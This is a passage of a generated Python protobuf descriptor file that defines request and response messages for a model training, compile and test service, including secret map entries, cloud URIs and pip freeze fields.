dependencies=[github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_training_dot_v1alpha1_dot_generated__pb2.DESCRIPTOR,github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_data_dot_v1alpha1_dot_generated__pb2.DESCRIPTOR,github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_infra_dot_v1alpha1_dot_generated__pb2.DESCRIPTOR,github_dot_com_dot_metaprov_dot_modelaapi_dot_pkg_dot_apis_dot_catalog_dot_v1alpha1_dot_generated__pb2.DESCRIPTOR,k8s_dot_io_dot_api_dot_core_dot_v1_dot_generated__pb2.DESCRIPTOR,])
_TRAINREQUEST_SECRETENTRY = _descriptor.Descriptor(
name='SecretEntry',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest.SecretEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest.SecretEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest.SecretEntry.value', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1230,
serialized_end=1275,
)
_TRAINREQUEST = _descriptor.Descriptor(
name='TrainRequest',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='product', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest.product', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest.version', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bucket', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest.bucket', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='model', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest.model', index=3,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='study', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest.study', index=4,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='datasource', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest.datasource', index=5,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dataset', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest.dataset', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='connection', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest.connection', index=7,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='secret', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainRequest.secret', index=8,
number=10, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_TRAINREQUEST_SECRETENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=446,
serialized_end=1275,
)
_TRAINRESPONSE_PIPFREEZEENTRY = _descriptor.Descriptor(
name='PipFreezeEntry',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.PipFreezeEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.PipFreezeEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.PipFreezeEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1723,
serialized_end=1771,
)
_TRAINRESPONSE_FEATURESIMPORTANCEENTRY = _descriptor.Descriptor(
name='FeaturesImportanceEntry',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.FeaturesImportanceEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.FeaturesImportanceEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.FeaturesImportanceEntry.value', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1773,
serialized_end=1830,
)
_TRAINRESPONSE = _descriptor.Descriptor(
name='TrainResponse',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='result', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.result', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='weightsCloudUri', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.weightsCloudUri', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='manifestCloudUri', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.manifestCloudUri', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='logsCloudUri', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.logsCloudUri', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='labelEncoder', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.labelEncoder', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pythonVersionInfo', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.pythonVersionInfo', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pipFreeze', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.pipFreeze', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='featuresImportance', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TrainResponse.featuresImportance', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_TRAINRESPONSE_PIPFREEZEENTRY, _TRAINRESPONSE_FEATURESIMPORTANCEENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1278,
serialized_end=1830,
)
_COMPILEREQUEST_SECRETENTRY = _descriptor.Descriptor(
name='SecretEntry',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest.SecretEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest.SecretEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest.SecretEntry.value', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1230,
serialized_end=1275,
)
_COMPILEREQUEST = _descriptor.Descriptor(
name='CompileRequest',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='product', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest.product', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest.version', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bucket', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest.bucket', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='model', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest.model', index=3,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='study', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest.study', index=4,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='datasource', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest.datasource', index=5,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dataset', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest.dataset', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='connection', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest.connection', index=7,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='secret', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.CompileRequest.secret', index=8,
number=10, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_COMPILEREQUEST_SECRETENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1833,
serialized_end=2666,
)
_COMPILERESPONSE = _descriptor.Descriptor(
name='CompileResponse',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.CompileResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='compiledModelUri', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.CompileResponse.compiledModelUri', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2668,
serialized_end=2711,
)
_TESTREQUEST_SECRETENTRY = _descriptor.Descriptor(
name='SecretEntry',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest.SecretEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest.SecretEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest.SecretEntry.value', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1230,
serialized_end=1275,
)
_TESTREQUEST = _descriptor.Descriptor(
name='TestRequest',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='product', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest.product', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='version', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest.version', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bucket', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest.bucket', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='model', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest.model', index=3,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='study', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest.study', index=4,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='datasource', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest.datasource', index=5,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dataset', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest.dataset', index=6,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='connection', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest.connection', index=7,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='secret', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestRequest.secret', index=8,
number=10, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_TESTREQUEST_SECRETENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=2714,
serialized_end=3541,
)
_TESTRESPONSE_PIPFREEZEENTRY = _descriptor.Descriptor(
name='PipFreezeEntry',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.PipFreezeEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.PipFreezeEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.PipFreezeEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1723,
serialized_end=1771,
)
_TESTRESPONSE_FEATURESIMPORTANCEENTRY = _descriptor.Descriptor(
name='FeaturesImportanceEntry',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.FeaturesImportanceEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.FeaturesImportanceEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.FeaturesImportanceEntry.value', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1773,
serialized_end=1830,
)
_TESTRESPONSE = _descriptor.Descriptor(
name='TestResponse',
full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='train_result', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.train_result', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='test_result', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.test_result', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='benchmark_result', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.benchmark_result', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='modelWeightsCloudUri', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.modelWeightsCloudUri', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='modelManifestCloudUri', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.modelManifestCloudUri', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='modelLogsCloudUri', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.modelLogsCloudUri', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='preWeightsCloudUri', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.preWeightsCloudUri', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='preManifestCloudUri', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.preManifestCloudUri', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='preLogsCloudUri', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.preLogsCloudUri', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='labelEncoder', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.labelEncoder', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='misclassUri', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.misclassUri', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pythonVersionInfo', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.pythonVersionInfo', index=11,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pipFreeze', full_name='github.com.metaprov.modelaapi.services.trainerd.v1.TestResponse.pipFreeze', index=12,
number=13, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
